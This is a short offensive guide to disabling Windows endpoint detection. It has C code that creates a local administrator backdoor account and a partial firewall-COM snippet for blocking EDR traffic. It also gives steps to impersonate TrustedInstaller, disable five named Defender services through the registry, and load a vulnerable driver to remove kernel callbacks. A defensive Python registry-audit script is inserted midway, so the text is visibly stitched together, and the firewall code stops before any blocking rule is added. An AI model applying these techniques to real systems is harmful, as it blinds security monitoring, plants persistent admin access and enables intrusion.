EDR Killing

First, create a local administrative account so that local policy can be enforced. The firewall may not be enabled locally because of managed policy. The following C program creates a local administrative account, so that the local policy is enforced instead of the domain policy:

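#include <windows.h>
#include <lm.h>
#include <stdio.h>

// GenString() is a helper that is not shown on this page.
int main(){
	srand (GetCurrentProcessId());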
	WCHAR *username= NULL;
	WCHAR *password = NULL;
	USER_INFO_1 ui;
	DWORD dwError = 0;
	GenString(&username, 12, 26);
	GenString(&password, 12, 71);
	// username and password are wide strings, so print them with %ls
	printf("Username is: %ls\n", username);
	printf("Password is: %ls\n", password);
	
	ui.usri1_name = username;
	ui.usri1_password = password;
	ui.usri1_priv = USER_PRIV_USER;
	ui.usri1_flags = UF_DONT_EXPIRE_PASSWD;
	ui.usri1_home_dir = NULL;
	ui.usri1_comment = NULL;
	ui.usri1_script_path = NULL;

	NET_API_STATUS status;
	status = NetUserAdd(NULL, 1, (BYTE*)&ui, &dwError);
	if(status != NERR_Success) {
		printf("NetUserAdd failed. Error: %d\n", status);
	}

	LOCALGROUP_MEMBERS_INFO_3 lmi;
	lmi.lgrmi3_domainandname = username;
	status = NetLocalGroupAddMembers (NULL, L"Administrators", 3, (BYTE*)&lmi, 1);
	if(status != NERR_Success) {
		printf("NetLocalGroupAddMembers failed. Error: %d\n", status);
	}
	return 0;
}

Then, block the EDR network range. Since most EDRs are cloud-based, the network range can be identified by monitoring network traffic with Network Monitor (signed by Microsoft: https://www.microsoft.com/en-ca/download/details.aspx?id=4865):

// gcc firewall.c -o firewall.exe -lole32 -loleaut32 -luuid
#include <windows.h>
#include <stdio.h>
#include <netfw.h>

int main() {
	HRESULT hr;
	GUID GUID_HNetCfg_FwPolicy2 = {0xe2b3c97f, 0x6ae1,0x41ac,{0x81,0x7a,0xf6,0xf9,0x21,0x66,0xd7,0xdd}};
	IClassFactory *icf = NULL;
	IDispatch *id = NULL;
	INetFwPolicy2 *nfp2 = NULL;

	hr = CoInitialize(NULL);
	hr = CoGetClassObject(&GUID_HNetCfg_FwPolicy2, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER, NULL, &IID_IClassFactory, (VOID **)&icf);

	if(hr != S_OK) {
		printf("CoGetClassObject failed: HRESULT 0x%08x\n", hr);
		CoUninitialize();
		ExitProcess(0);
	}
	
	hr = icf->lpVtbl->CreateInstance(icf, NULL, &IID_IDispatch, (VOID**)&id);
}

After that, disable the service: https://github.com/Mr-Un1k0d3r/EDRs/blob/main/elevate_to_system_or_trustedinstaller.c

You can impersonate the TrustedInstaller privilege by duplicating the service token and getting the group.

With the TrustedInstaller privilege you can tamper with the registry keys associated with the services.

Remove the ImagePath and set Start to 0x4 for the following services:

▪ Sense
▪ WdBoot
▪ WinDefend
▪ WdNisDrv
▪ WdNisSvc

Reboot and the EDR should not be working.
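From the defender's side, the registry change described above can be audited from collected `reg query` output. The following is an added example, not code from the original page: it parses that output for the five services listed and flags a missing ImagePath or a Start value of 0x4. The sample dump, its placeholder paths and the function names are constructed for illustration.

```python
import re

# Services the page lists as tampering targets.
WATCHED = {"sense", "wdboot", "windefend", "wdnisdrv", "wdnissvc"}
SERVICE_DISABLED = 0x4  # Start value meaning "disabled"

# Constructed sample of `reg query <service key>` output (paths are placeholders).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend
    ImagePath    REG_EXPAND_SZ    "C:\placeholder\MsMpEng.exe"
    Start    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense
    Start    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc
    ImagePath    REG_EXPAND_SZ    "C:\placeholder\NisSrv.exe"
    Start    REG_DWORD    0x4
"""

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")

def parse_reg_query(text):
    """Return {service_name_lower: {value_name_lower: data}} from reg query text."""
    services, current = {}, None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            current = services.setdefault(line.rstrip("\\ ").rsplit("\\", 1)[-1].lower(), {})
        elif current is not None and (m := VALUE_RE.match(line)):
            current[m.group(1).lower()] = m.group(3).strip()
    return services

def audit(text):
    """List (service, finding) pairs; a watched service absent from the dump is also reported."""
    services, findings = parse_reg_query(text), []
    for name in sorted(WATCHED):
        values = services.get(name)
        if values is None:
            findings.append((name, "key missing from dump"))
            continue
        if not values.get("imagepath"):
            findings.append((name, "ImagePath missing or empty"))
        start = values.get("start")
        if start is None or int(start, 16) == SERVICE_DISABLED:
            findings.append((name, "Start missing or set to 0x4 (disabled)"))
    return findings

if __name__ == "__main__":
    print(*(f"{s}: {f}" for s, f in audit(SAMPLE)), sep="\n")
```

Comparing the findings against a known-good baseline for the same OS build separates tampering from services that are legitimately absent or disabled on that host.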

Some EDRs prevent tampering from the kernel, so you can bring your own vulnerable driver to compromise the kernel and remove the kernel callback: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

Drivers tend to be poorly designed and there are vulnerabilities all over the place.
